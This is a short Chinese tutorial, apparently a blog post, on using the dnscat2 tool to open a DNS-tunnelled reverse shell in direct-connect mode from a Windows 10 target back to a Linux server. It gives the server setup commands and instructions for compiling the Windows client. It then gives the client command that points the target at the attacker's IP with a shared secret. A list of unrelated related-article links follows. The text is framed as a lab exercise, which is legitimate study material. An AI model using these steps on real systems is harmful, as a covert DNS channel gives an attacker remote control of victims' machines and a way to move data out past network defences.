使用dnscat2 进行dns隧道反弹shell——直连模式linux对windows

  • 直连模式:客户端直接向指定IP地址的DNS服务器发起DNS解析请求

环境搭建

搭建服务端

git clone https://github.com/iagox86/dnscat2.git

cd dnscat2/server/

gem install bundler

apt-get install ruby-dev

bundle install

过程会有点慢

开启服务端

ruby ./dnscat2.rb

搭建客户端

这里首先需要在Visual Studio 2008中打开一个解决方案:client\win32\dnscat2.vcproj。然后编译就会看到client\win32\Release下有一个dnscat2.exe文件了

将这个文件上传至win10靶机运行

开启客户端

dnscat2.exe --dns server=192.168.227.128,port=53 --secret=9d42a40bfeef7cf1f781326684d4d3e0

剩下的就和linux一样,进入隧道反弹shell,然后ctrl+z返回上一层

进入弹回来的shell

相关推荐
闪电悠米6 分钟前
力扣hot100-438.找到字符串中所有字母异位词-固定长度滑动窗口详解
linux·服务器·数据结构·算法·leetcode·滑动窗口·力扣hot100
碧蓝的水壶2 小时前
数据转换过程
java·开发语言·windows
zhanghaofaowhrql7 小时前
Cursor+GitOps:自动化运维新姿势
运维·自动化
weixin_471383039 小时前
Docker - 05 - 构建流程
运维·docker·容器
夏玉林的学习之路10 小时前
如何远程连接服务器
运维·服务器
风曦Kisaki11 小时前
#Linux数据库管理Day06:主从同步与MaxScale读写分离
linux·运维·数据库
小楼昨夜又东风12611 小时前
使用python快速拉包
linux
Tipriest_12 小时前
ubuntu创建和更换当前swap大小
linux·运维·ubuntu
雨辰AI12 小时前
生产级实战:人大金仓 V9 标准化运维手册(日常巡检 + 监控告警 + 应急处置)
java·运维·数据库·后端
烟雨归来12 小时前
Windows 安装 Proctorio Secure Companion App 报错 0x800B010A
windows